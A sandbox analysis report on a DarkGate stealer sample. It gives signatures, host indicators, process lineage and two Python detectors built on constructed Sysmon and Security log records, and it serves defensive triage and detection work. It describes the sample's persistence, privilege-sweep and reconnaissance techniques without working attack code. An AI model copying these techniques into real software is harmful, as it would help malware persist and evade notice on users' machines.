Malware Analysis Report

2024-11-15 07:17

Sample ID: 231117-y12dfseg9t
Target: New Compressed (zipped) Folder.zip
SHA256: 9e8edbacb53fe27d3723151ab2d6ed203473edf666caebfab7dbf442bd68d463
Tags: darkgate a11111 persistence stealer
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score: 10/10
SHA256: 9e8edbacb53fe27d3723151ab2d6ed203473edf666caebfab7dbf442bd68d463
Threat Level: Known bad

The file New Compressed (zipped) Folder.zip was found to be: Known bad.

Malicious Activity Summary

darkgate a11111 persistence stealer

Suspicious use of NtCreateUserProcessOtherParentProcess

DarkGate

Blocklisted process makes network request

Downloads MZ/PE file

Requests dangerous framework permissions

Executes dropped EXE

Loads dropped DLL

Enumerates connected drives

Adds Run key to start application

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Modifies registry class

Checks processor information in registry

Modifies data under HKEY_USERS

Enumerates system info in registry

Modifies system certificate store

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2023-11-17 20:16

Signatures

Requests dangerous framework permissions

Description Indicator Process Target
Allows an application to write to external storage. android.permission.WRITE_EXTERNAL_STORAGE N/A N/A
Allows an application to read from external storage. android.permission.READ_EXTERNAL_STORAGE N/A N/A

These two indicators are Android manifest permission strings matched by the static scan of the archive. They have no bearing on the Windows detonation that follows and should not be read as a capability of the sample.

Unsigned PE

Description Indicator Process Target
(5 hits: PE files without an Authenticode signature; the static scan recorded no description, indicator, process or target for any of them)

Analysis: behavioral1

Detonation Overview

Submitted: 2023-11-17 20:15
Reported: 2023-11-17 20:21
Platform: win10-20231025-en
Max time kernel: 273s
Max time network: 314s

Command Line

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

Signatures

DarkGate

stealer darkgate

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\tepp\AutoIt3.exe N/A

C:\tepp\AutoIt3.exe is a copy of the legitimate AutoIt interpreter executed from a short, freshly created directory. DarkGate is known to run its loader as a compiled AutoIt script through a copy of AutoIt3.exe dropped beside the script, so the C:\tepp directory (the interpreter and any .au3 file next to it) should be collected from an infected host.

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BraveCrashHandler = "C:\\Users\\Admin\\AppData\\Roaming\\BraveCrashHandler.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

The entry is written to the machine-wide Run key by powershell.exe. Its value name is styled after a browser crash-handler component, while the target executable sits directly in the user's AppData\Roaming folder rather than under any vendor directory. Both the value name and the file path are usable as host indicators.
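The Run-key write above is the kind of event Sysmon records as Event ID 13 (RegistryEvent, SetValue). The Python below is an added example and is not part of the sandbox report or of any tool it names: it scores constructed Event ID 13 records with three heuristics drawn from this indicator (the writer is a script host, the target is in a user-writable path, the executable was dropped straight into an AppData root) and shows why the writable-path test alone is too noisy, since a legitimate OneDrive entry also lives in AppData\Local. The field names follow Sysmon; the events, paths, weights and threshold are assumptions made for the example.

```python
import re

# Constructed Sysmon Event ID 13 (RegistryEvent: SetValue) records modelled on the
# Run-key indicator in this report. Field names follow Sysmon; the values are sample
# input for this example, not captured telemetry.
SAMPLE_EVENTS = [
    {"EventID": 13,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BraveCrashHandler",
     "Details": r"C:\Users\Admin\AppData\Roaming\BraveCrashHandler.exe"},
    {"EventID": 13,
     "Image": r"C:\Windows\System32\WScript.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1000\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r'"C:\Users\Admin\AppData\Local\Temp\upd.exe" /silent'},
    {"EventID": 13,   # legitimate: OneDrive maintains its own per-user Run entry
     "Image": r"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1000\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r'"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
    {"EventID": 13,   # legitimate: an installer registering a Program Files binary
     "Image": r"C:\Users\Admin\Downloads\vlc-setup.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VLC",
     "Details": r"C:\Program Files\VideoLAN\VLC\vlc.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",   # not a registry event
     "TargetObject": "", "Details": ""},
]

RUN_KEY_RE = re.compile(
    r"\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\(?P<name>[^\\]+)$", re.I)
USER_WRITABLE_RE = re.compile(r"\\(?:AppData|Users\\Public|ProgramData|Temp)\\", re.I)
# an .exe sitting directly in %APPDATA%, %LOCALAPPDATA% or %TEMP%, with no vendor folder
APPDATA_ROOT_EXE_RE = re.compile(
    r"\\AppData\\(?:Roaming|Local\\Temp|Local)\\[^\\]+\.exe$", re.I)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                "cmd.exe", "rundll32.exe", "regsvr32.exe", "msiexec.exe"}
THRESHOLD = 2   # assumption: a writable path alone (weight 1) is too common to alert on


def image_from_details(details):
    """Executable path from a Run value: a quoted path followed by arguments, or a bare path."""
    d = details.strip()
    if d.startswith('"'):
        return d[1:d.find('"', 1)]
    m = re.search(r"^.*?\.exe", d, re.I)   # unquoted paths may contain spaces
    return m.group(0) if m else d


def score_event(ev):
    """Score one event; None for anything that is not a Run/RunOnce value write."""
    if ev.get("EventID") != 13:
        return None
    m = RUN_KEY_RE.search(ev["TargetObject"])
    if not m:
        return None
    target = image_from_details(ev["Details"])
    writer = ev["Image"].rsplit("\\", 1)[-1].lower()
    reasons = []
    if writer in SCRIPT_HOSTS:
        reasons.append(("written by script host " + writer, 2))
    if USER_WRITABLE_RE.search(target):
        reasons.append(("target under a user-writable path", 1))
    if APPDATA_ROOT_EXE_RE.search(target):
        reasons.append(("executable dropped directly in an AppData root", 1))
    score = sum(w for _, w in reasons)
    return {"name": m.group("name"), "writer": writer, "target": target, "score": score,
            "reasons": [r for r, _ in reasons], "suspicious": score >= THRESHOLD}


def suspicious_run_keys(events):
    """Findings for every event that reaches the alert threshold."""
    return [f for f in map(score_event, events) if f and f["suspicious"]]


if __name__ == "__main__":
    for f in suspicious_run_keys(SAMPLE_EVENTS):
        print(f["name"], f["score"], f["target"], "; ".join(f["reasons"]))
```

Run as a script it prints the two constructed malicious entries (BraveCrashHandler and Updater) and nothing for OneDrive or VLC; the weighting is what keeps the OneDrive entry, which is in AppData but written by its own binary, below the threshold.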

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\A:, \??\B:, \??\E:, \??\G: through \??\Z: (23 letters; only C:, D: and F: are absent) C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A:, \??\B:, \??\E:, \??\G: through \??\Z: (the same 23 letters) C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A

The original table lists the 46 opens one per line, interleaved between the two processes. A sweep of every drive letter is expected of msiexec.exe, which checks free space on each volume while costing an installation; the same sweep performed by the extracted sample is the part that matters for triage.

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSI5594.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e58efba.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF150.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF366.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI3EEE.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e58efba.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF422.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{1C305533-9700-4743-83AA-EEF0896C4929} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF54C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF628.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF986.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7EF7.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI68FD.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF2D8.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF723.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF956.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI1879.tmp C:\Windows\system32\msiexec.exe N/A

Two of these entries are worth recovering from a host. C:\Windows\Installer\e58efba.msi is the Windows Installer cache copy of the package that was installed, so the MSI itself can be pulled from there for analysis. The file name SourceHash{1C305533-9700-4743-83AA-EEF0896C4929} carries the package's ProductCode GUID, which is also recorded in the Installer's registry product data and can serve as a host indicator. The MSI*.tmp files and inprogressinstallinfo.ipi are ordinary Windows Installer working files; the write to ngen.log suggests a .NET native-image generation step ran as part of the install.

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\tepp\AutoIt3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\tepp\AutoIt3.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133447259646841693" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\743AF0529BD032A0F44A83CDD4BAA97B7C2EC49A C:\Windows\System32\WScript.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\743AF0529BD032A0F44A83CDD4BAA97B7C2EC49A\Blob = (certificate blob; not preserved in this copy of the report) C:\Windows\System32\WScript.exe N/A (2 rows)

The key name is the SHA-1 thumbprint of the certificate that was written. AuthRoot is the store that Windows' automatic root-certificate update fills in, and a write there can be triggered by any process that validates a certificate chain, so the store modification is weak evidence on its own. The process doing it, WScript.exe, is the useful detail: a Windows Script Host instance ran during the detonation, and its parent is not recorded in the WriteProcessMemory rows below.

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A (2 rows)
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (41 rows)
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A (2 rows)
N/A N/A C:\tepp\AutoIt3.exe N/A (16 rows)
(61 rows in the original, one per process-enumeration call, collapsed here by process)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A (3 rows)

This signature fires when a process creates a child with the mitigation policy that blocks non-Microsoft-signed binaries from loading into it. Chrome applies that policy to its own sandboxed child processes, so these hits describe the browser's hardening rather than behaviour of the sample.

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A (2 rows)
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: (the 29 privileges listed below, in that order) N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A (59 rows: two complete passes, then a third pass that begins with SeCreateTokenPrivilege)

SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege

Reading the table: 7-Zip enabling SeRestorePrivilege and SeSecurityPrivilege while extracting, and msiexec.exe enabling SeSecurityPrivilege while installing, is the normal behaviour of those tools. "Token: 35" is a privilege LUID the sandbox did not resolve to a name; 35 is SE_CREATE_SYMBOLIC_LINK_PRIVILEGE in winnt.h, which fits an archiver that may have to recreate symbolic links. The extracted sample's list is different in kind: the 29 names are exactly LUIDs 2 (SeCreateTokenPrivilege) through 30 (SeCreateGlobalPrivilege) in numeric order, SeDebugPrivilege and SeTcbPrivilege included, and the sequence is run through more than twice. That is the footprint of a loop that asks for every well-known privilege regardless of need, something legitimate installers and archivers have no reason to do, and the call pattern is visible in Security event 4703 on a real host.
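Security event 4703 ("A user right was adjusted") logs the privileges a process enables through AdjustTokenPrivileges, which makes the sweep above detectable on a real host. The Python below is an added example and is not part of the report: it builds constructed 4703-style records from this table (field names from the real event; the sample path abbreviated; "Token: 35" written as SeCreateSymbolicLinkPrivilege, its LUID in winnt.h) and separates the archiver and installer, which enable one to three privileges, from a process that enables 29 distinct privileges in LUID order and restarts the sequence. The threshold of 10 distinct privileges and the high-value set are assumptions made for the example.

```python
from collections import defaultdict

# Constructed Windows Security event 4703 ("A user right was adjusted") records shaped
# after this report's AdjustPrivilegeToken table. Field names follow the real event
# (ProcessName, EnabledPrivilegeList); the values are sample data, not captured logs.
# Assumptions: the sample path is abbreviated, and the report's unresolved "Token: 35"
# is written as SeCreateSymbolicLinkPrivilege (LUID 35 in winnt.h).
SAMPLE_EXE = r"C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b...e5c5.exe"
SEVEN_ZIP = r"C:\Program Files\7-Zip\7zG.exe"
MSIEXEC = r"C:\Windows\system32\msiexec.exe"

# The 29 privileges the sample enabled, in the report's order: LUID 2
# (SeCreateTokenPrivilege) through LUID 30 (SeCreateGlobalPrivilege) from winnt.h.
SWEEP = [
    "SeCreateTokenPrivilege", "SeAssignPrimaryTokenPrivilege", "SeLockMemoryPrivilege",
    "SeIncreaseQuotaPrivilege", "SeMachineAccountPrivilege", "SeTcbPrivilege",
    "SeSecurityPrivilege", "SeTakeOwnershipPrivilege", "SeLoadDriverPrivilege",
    "SeSystemProfilePrivilege", "SeSystemtimePrivilege", "SeProfSingleProcessPrivilege",
    "SeIncBasePriorityPrivilege", "SeCreatePagefilePrivilege", "SeCreatePermanentPrivilege",
    "SeBackupPrivilege", "SeRestorePrivilege", "SeShutdownPrivilege", "SeDebugPrivilege",
    "SeAuditPrivilege", "SeSystemEnvironmentPrivilege", "SeChangeNotifyPrivilege",
    "SeRemoteShutdownPrivilege", "SeUndockPrivilege", "SeSyncAgentPrivilege",
    "SeEnableDelegationPrivilege", "SeManageVolumePrivilege", "SeImpersonatePrivilege",
    "SeCreateGlobalPrivilege",
]


def ev(process, *privs):
    """One 4703 record; the real event carries a newline-separated privilege list."""
    return {"EventID": 4703, "ProcessName": process, "EnabledPrivilegeList": "\n".join(privs)}


SAMPLE_EVENTS = (
    [ev(SEVEN_ZIP, "SeRestorePrivilege"), ev(SEVEN_ZIP, "SeCreateSymbolicLinkPrivilege"),
     ev(SEVEN_ZIP, "SeSecurityPrivilege"), ev(SEVEN_ZIP, "SeSecurityPrivilege"),
     ev(MSIEXEC, "SeSecurityPrivilege"),
     {"EventID": 4704, "ProcessName": MSIEXEC, "EnabledPrivilegeList": "-"}]  # other event id
    + [ev(SAMPLE_EXE, p) for p in SWEEP] * 2        # two complete passes, as in the report
    + [ev(SAMPLE_EXE, "SeCreateTokenPrivilege")]    # the start of a third
)

HIGH_VALUE = {"SeDebugPrivilege", "SeTcbPrivilege", "SeLoadDriverPrivilege",
              "SeTakeOwnershipPrivilege", "SeBackupPrivilege", "SeRestorePrivilege"}
SWEEP_THRESHOLD = 10   # assumption: more distinct privileges than any ordinary tool needs


def summarize(events):
    """Per process: privileges enabled, distinct count, restarts of the sequence
    (a loop over LUIDs comes back to its first privilege), and a sweep verdict."""
    seqs = defaultdict(list)
    for e in events:
        if e.get("EventID") != 4703:
            continue
        for priv in e["EnabledPrivilegeList"].replace(",", " ").split():
            if priv != "-":
                seqs[e["ProcessName"]].append(priv)
    out = {}
    for proc, seq in seqs.items():
        distinct = set(seq)
        out[proc] = {"enabled": len(seq), "distinct": len(distinct),
                     "restarts": seq.count(seq[0]) - 1,
                     "high_value": sorted(distinct & HIGH_VALUE),
                     "sweep": len(distinct) >= SWEEP_THRESHOLD}
    return out


def flagged(events):
    """Processes whose privilege use looks like an enable-everything sweep."""
    return [p for p, s in summarize(events).items() if s["sweep"]]


if __name__ == "__main__":
    for proc, s in summarize(SAMPLE_EVENTS).items():
        name = proc.rsplit("\\", 1)[-1]
        print(f"{name}: {s}")
```

The point of the `restarts` count is that a single high-value privilege (7-Zip's SeRestorePrivilege here) is not an alert on its own; the combination of many distinct privileges and a sequence that wraps around is what separates the sample from the tools around it.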

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A (1 row)
N/A N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A (1 row)
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A (27 rows)

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A (24 rows)

Suspicious use of WriteProcessMemory

Description Indicator Process Target
(the sandbox records two or three writes per process creation; each parent/child pair is listed once here with its original row count)
PID 3260 wrote to memory of 2564 (3 rows) N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 736 wrote to memory of 2112 (3 rows) N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe C:\Windows\SysWOW64\msiexec.exe
PID 3260 wrote to memory of 4552 (3 rows) N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4552 wrote to memory of 1248 (2 rows) N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 1248 wrote to memory of 4668 (2 rows) N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4668 wrote to memory of 2680 (2 rows) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\whoami.exe
PID 4552 wrote to memory of 680 (2 rows) N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 680 wrote to memory of 2684 (2 rows) N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4552 wrote to memory of 2136 (2 rows) N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 1584 (2 rows) N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4552 wrote to memory of 828 (2 rows) N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 828 wrote to memory of 5000 (2 rows) N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4552 wrote to memory of 3444 (2 rows) N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 3444 wrote to memory of 3464 (2 rows) N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process lineage reconstructed from these rows (PID, image):

736   C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe (the extracted sample)
  2112  C:\Windows\SysWOW64\msiexec.exe (installer client launched by the sample)
3260  C:\Windows\system32\msiexec.exe (Windows Installer service)
  2564  C:\Windows\syswow64\MsiExec.exe
  4552  C:\Windows\syswow64\MsiExec.exe (32-bit installer child; every PowerShell instance below is launched from it)
    1248  powershell.exe
      4668  powershell.exe
        2680  whoami.exe
    680   powershell.exe
      2684  powershell.exe
    2136  powershell.exe
      1584  powershell.exe
    828   powershell.exe
      5000  powershell.exe
    3444  powershell.exe
      3464  powershell.exe

Two points for triage follow from the tree. The PowerShell instances are launched by an msiexec.exe child of the Installer service, which is how an MSI package's custom actions execute, so the package cached under C:\Windows\Install er (listed under "Drops file in Windows directory" above) is where those commands can be recovered. The only visible child of the PowerShell chain is whoami.exe, i.e. user and privilege reconnaissance; each PowerShell instance also starts a second powershell.exe before the chain ends, and the command lines themselves are not captured in this section.
PID 4552 wrote to memory of 3732 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 4552 wrote to memory of 3732 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 3732 wrote to memory of 460 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3732 wrote to memory of 460 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4992 wrote to memory of 2868 N/A C:\Windows\System32\control.exe C:\Windows\system32\rundll32.exe
PID 4992 wrote to memory of 2868 N/A C:\Windows\System32\control.exe C:\Windows\system32\rundll32.exe
PID 2100 wrote to memory of 4968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 4968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2100 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\New Compressed (zipped) Folder.zip"

C:\Windows\system32\fontdrvhost.exe

"fontdrvhost.exe"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" a -i#7zMap24083:256:7zEvent10066 -tzip -sae -- "C:\Users\Admin\Desktop\New Compressed (zipped) Folder\c788100411c38388afc3438dccc05297ac7a77083f579e4a7e8d6e1479214fde.zip"

C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe

"C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

